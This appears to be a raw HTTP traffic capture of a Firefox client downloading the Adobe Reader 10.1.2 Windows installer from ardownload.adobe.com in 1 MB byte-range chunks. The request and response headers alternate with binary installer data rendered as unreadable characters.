Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:07 GMT
Content-Range: bytes 14680064-15728639/53784984
Content-Length: 1048576
Connection: keep-alive
..j........'.... v.....r....x=.......p..u].79...)/..&...7.eR.U..37.h_.w.g.6a..}...J...r..=...(.kI...u..b<.9..~.A....T...A.g...Ux...........'...s...M.\....8.....6..`......&....3@;.j....U`.....|..X..wVM~V....dyj...xm..a.Y.........^..<l..-.....~t.mdL......C&5.`wcI....q.BL.g.58.......W.w....... z.bu.7D....a...T&..7./2.r...Ch..G..9O....y........@.>e.C..2<.....*.A..0@..9..r....YL...b..s..p...:]..=.N.%.. =....[...I......X9<....L:).M.wzE..8.#.........K.....1....81-:R.p.....>.4'|.H..9T.... ..9....\..6.!..z... ..E...>."....f....H.}....&...|..a......VF.l.*.i...a..l,C..b..b..=.."..O..3..|.........jh...9.I.V...;.{.z.rR.h.$U..#.....T.....9"lb.?FT.m..].c.}.. .r..Ql...,Ub.Q...)'-4I....`{./...@.A.6/.#..B.k......J_....=...?...WB...=..W..... ._OP.gR.I ...H.f0I.uI......=..VV.. .....G]..:s...h..?....V......&.V.@...._.......9.S.!...Bb....XJ..b.K.%.}.e.......2.....k..*..:..._]<r....3............. ......H.....@.zh.2....M^..JCJW...X S.1......,Z.xR .FB..mn[.....%n...H;~..y......b.1. .g..5.B.G~.db.c............*9 b..."5..}.v..f.........z.g.E..`Z-...l3?..0...@V(.[/.....T.&s.i....#.....g.Aay...o.0............2.r8.....-.H.Gu-~p...7.R7...&.....zw... .k........... |.0C.pFy.hE....>.\...._......MC..e....O @rU]...nk.C.5.K.-...9.i.B......}.j]...gX.....,.K..|...........KF.Eg..i ..}..9O 2..<....$.9..'FU.8wY.Sa]Q>..&...@\......mjN.5.uC..T...V*.a..}.).....}...?......z.).|.a.B...>........z..z}.....L.w.$.6.....Fe...x.c.... ..r..U.....q<...b..:..x...........\w.....2Bnv..a../.W....!..m...|Id.,G9v~`.P.....D..WT..0i~.
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=15728640-16777215
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:07 GMT
Content-Range: bytes 15728640-16777215/53784984
Content-Length: 1048576
Connection: keep-alive
..&......Ps.6..P...L.:.0..9...X..8.......v.(Rs.qf....'..u.V.........??.D._.....w.B....G..Y*..6(....I%...24...MZ.BH..{=.....|.#.......|.......v.3.........j..%....K.....=.&.4.....w.. o...../...BlG......a3U.{..$...{......y.z}rt.0.U.s.k.z.Q..(...&..so.$...@..CV.......,~#;.xQ..^E......V... ...S%p....x./TF.^S......7..E.`.X....qR.px..\k...H......vcN.BUL.....B/.2.......Q!.D..>......cD...z0..5.L7......m..s7x1q.x...J..>N}.m.T...]..]&......^......8..*..J...n|..e.W_...C!M.N...g%_.V....J...........C........a. ......)UN...........r...&....L.C..."l.NHM....g...}...Q.#.......Ka6\.....\4....qa.5.I.RN....v.BMU.DY..mq..Mkn.~.;.3X.....*-...<..@ ..M0f\["v.6.. ._..U.%3.@P=....D~.A;d.......-8..H..F...../.H..........q.V.j..g.uuC..r........VGX....K.t...d..-.NHF!fA#.[F>.e....'..0.]%..&.q!\.a.....pU..\B....h...^^,.&./sxoT..'Z...;...~...v.>..`._O......;..!=."F....B.s).F.....j.)K.h*.Gu..rc..#...".W`pt..:......,.sHqW&0g\&..,3....5..{....#.f,_;.t..~.)do).de......O...3...<2.3.25&......V.57.%.}oE.\Z...,?...b.}J...:..7j6...n.x6,5......dgh}.9...b.Y......?.MI4.Rj.....=.Z.t.b|..o.~4......I......m...Z..=..W{..q"'$.....L6.9.@..2...Z...y/......R.....b.T.....N}..P..T..z.e.$.B.."t}....e.ol.J......#.^.xms'h"..@.....lH....c..'.]..{...1!...w.A..K.V.^.......J2.o.0{...C.P..3.[.......,."$......M.yr...tN.......%..;.t.-....._........'....58.rR.Z..1.^.9E..../{h..W..t...i..`X2>.}..D./.>...u>!O ?4...(E.....s8KlJX......d...k.ULE..V../....b.a..Jv.w<.^...sp#z..j.. 0.....B`0xin....W....D..J]n..Q#..V....i%U.Y-..v....J...:.p(T..s.....`$`my.
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=16777216-17825791
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:08 GMT
Content-Range: bytes 16777216-17825791/53784984
Content-Length: 1048576
Connection: keep-alive
...=....}..r.\.l...bt.....'z:..`...-!Q....?.!.l1......`....n.s...~] .........n/...&....i...>.h.(Jf...r@..~.......)...... ...U....V..*.I..;0..$..RoE...*....Y",9.>KN.........V.....H:.."..9...Q.r...d.=.`.....}v...0#...?..q...p`...o..k\..;.It./..w...7.............U/.....r).%....i.....v6...'....R6n>t..%...4x_W%..w.!..H....4..%.l.....v.o.....d.@>...w.8..2....9Q..B...D.d.....03..Yq.l.. .....b.eA.....0...*%'.5..d...[.s.,.2.......[..[......@JxE.H..".p..nH.........G.8...mJ.rCt..H..........Cn......x]0...!.})a)Y"Y.G....NV}..U....../2gv.e..l...._........:.W8..k.Df..F.&...N...A..O2...~ua..x...8._o..5..j.3.e...P.N#.G..;:H.......e.....`.o[......1...S.;9........w..U....pF......9....H.0b.............,..6.Iy......l<7..6...1....z.r......g.HJ<lou.."....5P....5..........oh.a:....D..~....u[..y[..\........ ./mJ?X.1.o0......F.I~E...j.....!..@..z.=OE.......@1..E5.....-. ...h.QK.5..x=k&..-M.^@f..c[u(.(z.J....y.@1V... s.lR....].....as].1...T........!v..x=y.O.g...;..H......Q../....ZQ....z.....K...#.....?..S@.S..G....F[...O#...|uu.K...g.`...j...{U.J.P_..j......y\.V.....V!.&.Ui..#.{2' .R..GZ.....=....&M..=y..ka.....s.P. ./..tZ.../.b `m....d.M.R.Qkw.hN...Q....$.Jl.&xO...6..].Q.)7...<?.9.X$H ..Hw.......~...-hal.........G!..K....n..1.j.....l...H.Bn.>...-......o...Nw.`......_Ox...,"..0VH.Z......=..7J(Y..F...T.0.......Z4............*./t..z_.'H.......4 ....'e.e.....l..p..C,..fs ....~...lr >.u...@.*Dj.......Q.:..z.A....x....<}......v.D .6^eL.......S...;............L.....[..br.r^.......]r.d;\A.&.&:.....-mE..A{...'L..j.
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=17825792-18874367
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:08 GMT
Content-Range: bytes 17825792-18874367/53784984
Content-Length: 1048576
Connection: keep-alive
...J.!0...~.C.F...{w.R.h..Fr.X o....qf.YK.............r._.....<..]..mVT....Ug...p.}....I...5\.0.................o.......v.qZ., ........t-..KH...- (.\.....n...2..#.?..... M ~3......8t.G.&.... ..g.....3....="....7..M....F.=$...7......ZEwG....\...5..7k/......v..........8...H...i.0...F3.....9..f9'......\..W2......Z.j.).g............._4M........! ...Tof.@`..r.....g........<...KW....Q...a......J..<.".7M....r}......s,......jLO.f.(1.F....pK....a4...C......_<-3........z..u9gf..^..D...T..a;.n.va..4..:....xi.2x..!8a..)}*.....J<T.e.d..bG..y.. .;.>.A.n.>.Co.i.U0.j.L1o.`.V.Z.=[..UB.u.9.........._6.....`.....q.......0......y..@.$..'H......W.&..F.`.-y.X.......Z..(..w.U.9EI....(Q..W ...e........ .(.~c...E.1......ho..3-..O4..9hI.&.9V..c....in..d..%.....#%.<...K.2~..r9.plp6Zt.N/*....=.?9..n........uq=[^........2...........D. ..S.z .........Va......_.g;8..AFtj.;|....[.f.c..U..8u.kp..,..X..f....qu.s. h.....!>#..F.._....0..[3T..%.....G.j..a.../bz>hcV.....3w...&(...>r<U..........U.........2wG.sr...L0<.D...../5,..M... o*..!..'..(...........F..Bx.~:cjU.......o5...6.A$.Z....PTr..*I.......6...9.s.....f..,.@..[....\.X.!.`.q!S.l.m...q6..3...........\.|}....%$.6....S........76.F.#.....M%...l.....I,.O..R.../.N.,s7s.@..R=.Z.0~ .'.}..Q.U..h......s.z....o.@..=.oJ....n.!..A......=...% .0..>.v...C.p..uN..b..@4..*N..*..aHFe.g`..b.....V.#,*.._.......h.......:..B.....Fa...f.....t.cN..2m..........?..E...u...>L...0..[?.....\_.o..5v..f.......Fd.p..v>.p.Y.O$.t.8..s....!...uDt...9../.s.Tg..o....b%.@>..'|
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=18874368-19922943
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:09 GMT
Content-Range: bytes 18874368-19922943/53784984
Content-Length: 1048576
Connection: keep-alive
..FU.N.a..m......k...(7...q.B.(23R9...T.m.R.....Mw...(..N.g.v..r...u.7..,....wa.kdu......7...C.e4.E..SK).OX.Y.E4f[......a......J.....xh...._...{...s3...%.S....\-.O."...#.....50oU.....*...x..U..3..k.m..G!.P.".m).=gL...b...5...6.y:.wQ .........8W...u.=i.N.l....p......!..E.}.~.2./....ObYf.U.....uZ....%.(mn.g ki]O.V 4=.c.(Y.R}..*Q.a.U..[..J...].....`.....>....f_..c...S.#Q..w...Z)f)s.H.*.u.....h....j..~.q..L..?X.....G.j.....m.r.......HT.w...c....4.........'.Iz..l._`a.q.D6....=..I..J..wCPx..T....9..k0.......:..P....);)&.$.c..Ub.su..1..."5.Q.....**#....9..#;....._Ra(/.}..~q....[.F.....n).......#...&..bG.BM.<....."jn....g#........a....qY....;z.).P.....i....|......C..'...X........R(.../........! ......o..C...?.ae.P.qH9.F.B.........*g..kg.aT.[|....>-..!..;..rMQ..B2\.WT..H.2h.6.Ap..!...4..=..o.69....Zy.....0.~....R)o.........M8...... `c..t!....w$..s0.WT......{...F@..}....2.....z~..(.ks...y}.a..X..Gp.J/bzg$:.Vr?k.\g.<...u..6.......g....4.2hq...Iq.......[./....>I..Sh..d*...hi..o\.m=......c...|x(..,X...7.[..0....6z..b/........i..X........,v.Q..(*>i..Q.4-aH.t7..N.ourO[@gwL.(]#...vz.0..k...6....dLo.|.:/..".%.R...fR.........s..kB.;.KyGfF.....~ .b....q..>..o=.r2d....55.Z.7...dx2..BE..M,...4.j..t.h...`.G<az#.?.6..m.6..;I.......@..3...dC.....Q!....;..B......T...Q..f...8...q........I.{.7...$'.w!....H.......4.......-oI..,,.l........Z.....-}r.v.i....%.=...Y..........x?..W7jK.<..;ER...)..U...!...............}a..S.....sI...W..X...2...}.......H.......L#.N3...)P.C3o.z.1.V....V.......L.;r.$..x...dya.........J.P.
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=19922944-20971519
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:09 GMT
Content-Range: bytes 19922944-20971519/53784984
Content-Length: 1048576
Connection: keep-alive
.......=../..)Hy...}{.LrPj......f}$e.a@k......k^/l.G. *fh._..f...3&W..:!.h..d..S./.g.8H..u......k}........6.\....... ..4..u.<..1...&q..... p.l<i..J...Gt....v|.i.9p...%..6....5O.^0ac1...{.$.....n>...4c.D...LM...Q.......].r*........x......O.};u.YQL}.K.....`...'=.]Tg..7?...s.....k....{J..}.k..L.T/.R...;..`K..AVW...9.q{......#.*_.#.."..r.:f'tg.A.[Ad.{...#.jO....!}g$...L.t..M..$$ku..w.(`....P...6...}.a..,.b@...t..r..@.A....a xm\,.....(,t.T.D{...~2..4.Yp4......3...8...Nt.?.......~.....H.< <...J..o3....#.....s..v......6=I%\.....g/<?....j.)r.a.-..P...H......`3.'.......^..v...8..@.z.......Kdm.._.eJ8.l.#.l.4.q......GW.w o3..H...L\.l.....!......'.......m(.....YE8.~...Pa.$..X.R.!p...~{>~*.F..J..l{p..`...iP..IY.T.....v.....W.P..f,s...o...........\r..D..t#I...b:fP|(^T.. xi....v..k..^.....5..t..=5.2.............,.N..W|2.... bS......4..?.t.....v...2..74m..]....b...|u9.....v..}.R..K.Up#...Zys5Lz.........GX>..1.6.....?..=.h....@.JD..T>...??.1y..Lv..t&..L3...4o.....W..3..JPM...(r..H.;...O.....M.w!..iY.*...'..j.<O6g.d.zt.2....X..kV...e.E#.....7U.4......"....... R.....C.. P.!..{...[.KmO.0.jh......?d%.h..~T......T..2.=UO...\U...Jq.dS.<HY....J..X(...p..3......mP..r.p<)..*.!.L4e...i.5..A.>...K...V.$?..;.S.C........v{.Q.]...a.|.`N..[..$.Z9...(Af.t.$!...-(..8....L1.pf.WG.[9K.2.zz....n.L.$.....(Od.!ah.....!v.....4.6.X...j...Z..P....qzH.....c{.?J=?..aInz"._k...>/#..z.0....}....;.?..o......X...O.$03...............)..)wl.Ge.>.. Uq%...V&..E8v8.V4".R...P.......{%V.........~5(]...u.j.19|..9.k...5.3?
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=20971520-22020095
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:10 GMT
Content-Range: bytes 20971520-22020095/53784984
Content-Length: 1048576
Connection: keep-alive
................k.c|r$(.....~....*....c.}^.%..&.q*...JY....i`......R.#..0M.vlop....3Eia.~e6......M..-z8l......6....|.M1&.. ..@..........4...p>.....[....[.N..8..U.. 1..a..D.6 ..|.`s........-O.6.(.HD.....@.Lv`:A.}.2.>j.0.6..f..ZiH. G.........Z..|.........T...,.["........@.E.P.W.*L..}.....k......... W...i....H.h.?.._\<..F..T3.w[.........\z.....p.Vg].NF..q#k.i...........D..9F....~i..M.M=;(.vH........@..E.-7...0......p....\r.=1..&.d...9.3T..ZQS.@.t.......".s............S...R.'$..A..8..p........?).w4.Zs.5. %|>..7Xt....o......Y[.G.u:....).zx.;H;.o]-.$G.f.p.....%a...!A......%j..S"..?A..[.....<...u.0.v..l.!x.*.U.eXk.\.8......S.....6..c...i1_T.v..Xv...*.VPoS"....Z.....V....]|.@V.....!........$f.2.E..AL........4..Z..x]/w...S........|.4o...^.0q...........6...9K_C?..&C....Z.0oKu.....O......[......)..e..........xM.M\.&.tv...5).q`.......i..rl<.....F.H{..5a..9..?.'....n.@.....ug.-.(E..q*....0a_.3..hDjc.E.`.t.:%. K....?.......{....H.7v.1...d.N..z.z?*....QV....:.|O4.b&..b.m..LZ.6.p....!.v...go.t....@.EcTyB.z.......5\.k....{!..--...l.j.6...rO...$.}p9.me*.K._...F..*d.!1.X...N.P...?..0..^....Gnk..'.^.. ...u. >.......f.[ ........U\..r...f..0...=.<.....p.*.gt..p'|....C.C..i..J..0.A...........XE_l.g...R.....w.-N.?..[.. ..K.b.....V9&...N.A....8BJpGJ8....8.#...........**.z........#Eu...X;.b-..o\B.(.s..F.;....q5.g.SM..Qa.......l......t.R>|S...%.u]U...%..$O.a..ffN.....(.|.....jw.n.P.....s.gq...Q-B'.,.x.Q..8...<..Nz.#... .. .*.*..K.....h...[..!C.O.y.T...DC..B...nv.a;...C.o3a..F..E.9A%......9@..F... X{O.L..V...
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=22020096-23068671
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:10 GMT
Content-Range: bytes 22020096-23068671/53784984
Content-Length: 1048576
Connection: keep-alive
....HR0...(.........|x..Bm$ ....>..u...,i..]...W!...&.~P..j...<;....]@q}#Z..9qaf'.@^=J. ...Q.*...^'......./{.W.2. ...K.....>....9t.......U;.b. ..G...H.?hC..8k{..x......D.C.6..-.-E.E.P..b.P..Ce.......UE.Q...i.......S%..P.M...S....;...Rf...K.e..~.<].... .8.......|)....-.8.}0_.....N....R.....E...G.L.9.?.0..O........8g..%.x..t...qE.R....{<...i.L..b.@.}..E..e........j|...w..j.."j.V..-<....'!0w......3Md..C..*}.e.....'.d.Fi.pQ...L..ne..|u..f.!...........`..d...bv........'H..h..*-r.f.0F.....U.%...3......#.(......,.;G...]}..x....^.-"....>.0&...A$6.T9..&m..p....%."?^5c.P.g.a..?uS...1. .A.._....AX.....=..7..$C.GO._.'`L.:.q...l.J....cZ.... .]..H....~.....@.{r..`w..9H....p5.W........Z.N9..W...?U..kQ{...o..Hm....?.\8..F._IKG..1Y.wk...KkX..A..X-?}.V.?.....mVV..~9..5C..at.<...a..G..B,~.}...nA..C.)&.z..Q:..J..D`.H..........pr......|....z..N.`..b.pN1...W..Y...S..Ew..)....:[.m..T........7..&.k...y}.Bd.8.....C...I.%....g..R.bcM..E\...!M=....(.?p..2.L..x......:....)l.P...a..=.....g../\....[o.......).."..e.uVgY.U.......2..t.#t..3.o_.gsE.V...~..3Um#....7 -]..U..7.*....I..>..]./{?.n.....v&.P......=\~...7QP.<...4......<_w....t.5.....;.....W,v..%..l.{i.>RMEu.E.:XO......i.....w<.c..a.*Y.......G3.1...~.E.7B......f.>..dB...;...{.e.X...d....2.....i......z}..}...GXY......?.Y.........Q.....b..:..C...rN.m............"-...v.x..Q.....n....;..P.A1......L...U..\.... i.^....H=8...A..K0v<A>.Y{.?.......(-.. ...0y..=?.........D...Yy...N.......T...%..hR ./W.. ..U..M....K.L..to....S.A..s(..o..0w..E.|.*#.P.
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=23068672-24117247
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:11 GMT
Content-Range: bytes 23068672-24117247/53784984
Content-Length: 1048576
Connection: keep-alive
.......U......W...........#..\....C..@|....ExQ.{?b...@x..s.J.`s..zg...%...c..3............l..Th...#.Y...n-..}a....6m...eWb....T.. G.J...e..uW....[.!.0..L.....h.y]..J=#0|(..v).......N....}8.....<..83.6n._S..Si.....4?....xqw.........!....i...gj.D.^.M........E{...c...z......t.....y..t.Wfk/._.f....l...J3E.U_.....<.........Q.M.U<Ho..v.....g....1z8...........93R.6....|..)....w.c........(..C..'c(..?X.f....D.t..a....7P.......$.Q.....<C>.V.L<.Q...x...~<....r..L...4.IJm.qBH#m......Ht.;..@.%...r#........Tq.R.x.RG.I?<)@O.p|...v..<3.TN.<.*. ..B.*|8E....x.....3.V..S....G.{.....4p.,.O...V...m1.... .M..a...n...x....9..=(.. ..#s>X.....@*(?.x]S.....C..7:Y.T....wy..f..@.[...X=..YX...~.nhe h.g.....G_.^...x.kB...Qm0Ol.q........R:p3.."....l...ue..J.AaY...`|a,@.....6..z....tyU^..9qe.).^.........n..Y..=K.{..Z..}...{.?./4wk..C.L.6..v:V....uZ<^.]....%.............N'..WJ..%>..&.../N.{F..d....q*....h.....*E..yzn.6.]1Y.....-X.x..a.zn.?M .........f...p.t..= ........E.....^.E...m.2.. p.&..........F.S.....EZ...g....1.._....._".....~.....8o.\u......O.XK?.T/....i5t.....K...',.....x..^h.*&..Zb.....)...I.1.....BhF.....Dc.$....4.@...&j$..E..q.:..Ri..*....]...LO.....I...X#..o.~...&."<..gcR.H.%.J.......#..z.....M..a.......Z..XomP<R?k^...-T.C.....=1.3dD.. kp.C?|4.>..@....)~p..s....Va.Y..b.Z3*.,........>v...:....z.S..L..V..5T.2G.;Pq.p...............@........!..........".M.%1'.....'..E{....ah....&.\:..O.D.. ..2"5..B8<.<S|[...A&)....R..T.........)u/...4`a0"0....".K#B.......'.Yu8.....Z..8?.B...d..'
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=24117248-25165823
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:11 GMT
Content-Range: bytes 24117248-25165823/53784984
Content-Length: 1048576
Connection: keep-alive
#....E.]......C..e.>.:..b`!GhP.....i,........1.....M.@#5.;.C.}89..W..O..Q...f..>......_....G..c`{.......U.*....I.&N.W.......S..J....0...........av5..P.........1#..t..J..!./.|Dh.ug..\m..?......H..bX..K...C."...z....}.8A 3."...w.#.......dc.Z..q7J5..C.>...G...vH.l..e..n...$.l..Q.k.%':.......E.F...We8.0..*V...bdU.e..K.JQI.......}/.^..J..S.y.M..i...U.9fC,%/.u......hMu..../...$.;.....p...5.0.7]...j..*.?.z..-...%.....t.s.}C-B_.y.).rpF}..]9...a...HU...6...G/.K.....}....f..[O.*2IK.e...6.. .R...*K.p.E.......]..~.Wp.w...V.s.1..f.k...`....I..^$...V.8..z...E{[...K.W...E...p.....e*.......A......PU_.'7..2Fn....M..._..h...5r.H.`.,.....Cmf8..MZ...{A:...).X......VG.....a....s>.$.4.a...^C....#.....o.A..d..V...S. (..TZ..F.nz).v...G....).2Z.O.OO..V..%...&.F..y)A.3l.0 .V.;..n>.v ....o..o.T.f.F2.....*.....~u.`..kw..:....'P?qv.U..-.!......9.....%$gH..9E(%.....Qo.....?.%..b .....$......*..M..eF.`j@M..I .......o@...,.H.......=.f....[.lq......G..@?..Q..................z"~=k.<...&.B...c.....N..C.8....F.@M&s7....7`.J*......!.K]j..Ze.j0..7..u4.....~...hV....*3k...5V...Y..X.\E.6....9...(W..b.E ...p......]&V..V.........*..J}(.. %..D...0^qS...c....D.....X%..L*o...'..x...UW...C.U.": 4...i..:%....(..u..n...k.!...y........N.J...{.<W.2....B_U:0...(I.SYu.$.........qK.7.k.....W...Sn...{...v.b....6 .WP.m..l.....H6".7>.'.........`]...$wbi'.H...$e...%.Z....M.58}.a......N..|z`p...o..R.......tJ..8...=.1../...n....!..>.@..n9.T.."Z...OY.......X.......K".c..3%z'.:...:;C..<n~..p..Z...c.L=2 #S..."C. \...us.s.p..ce$bY...M......5.
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=25165824-26214399
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:12 GMT
Content-Range: bytes 25165824-26214399/53784984
Content-Length: 1048576
Connection: keep-alive
X..M.[].:WC....`.4.l...KU..Q. .E...S......;.-.Fc.......:.....&.....Y..b......~4J.`.=gN&...g..............Ytd. ........G....k....E..<....=...>..N.\....mG....R/J........S...y&..;.o...|.K..L.bB... ...T.][M ..0....t.cJ%>P..%.(....e_...9.x.... ......9....@...!.k_..%........K..t..:..^.<..2. .%......ft....;4..*:.....<.jW..Qou/4.R..jKky...Y.,{..}.(z..3!......4.Az....r.1i..qI..~.....iv!I..M`..m.'.T.J.. .6..;...m/.l...b..C....T"S..#M..L..!C.{...TA=.......x..........ml...&.].8....k9...]r ....Ov....(...e.'.Wet-j.pG.m;..)....;.a!......@...C...M...A......J[ ...D7...@Ll.....wm.....!s....y%mW.|..Q..{.@..N..h.pm.mK.8.G..t..vq[..0!.....!.BMe.....Wh...9...M.q..............6.8w..6...Er...@..!.t..$.@........0.7.i_..v.."n.O.z.V.m.Y,......[.7rw......h.F. .....:5S.>`..M...M|...u..\.S..,..v../S. ..FE[..h.R..A....RU...>..s......Y.s_.(.j).!..x..|}&d..H.=.g...........\......t).b.K....E...hho..K*6..9*.....'F..!e.....x.. ....6...)~...t.........'E.-.N.6....Ar.. ...y.4.. Z.......r...`Z.-...K....8y<.@....[..k..e...0..EdB.Ip.Q..2....T.o.tx..j.k.D....Z!p.P.....H.t...%f..1.H.At^....*Oc.".mS6....j....B..#{yM\....../g...R...T...M.l.=/..(.<.Y...q...E.B.:u.=_{.`..w.....*$..e...K.;.N.,Y....._...9q....":)x.p..........rb..M........O.~A.4.B....W...}.q.......<......$.xV.1......F5:..E.{c.<....b;N.$.....d.Tm.....mL.......z.r...F.....W.....w....N7..k.^o.@...F.@%....U2sz....j&r.......1..>f.L.x...q.....%.R:.........@............p...s.6...b..j......A.....-C......|8x.X....P.@....v.2'.i......IN....h..9m.D..h...-....R.....].H...
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=26214400-27262975
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:12 GMT
Content-Range: bytes 26214400-27262975/53784984
Content-Length: 1048576
Connection: keep-alive
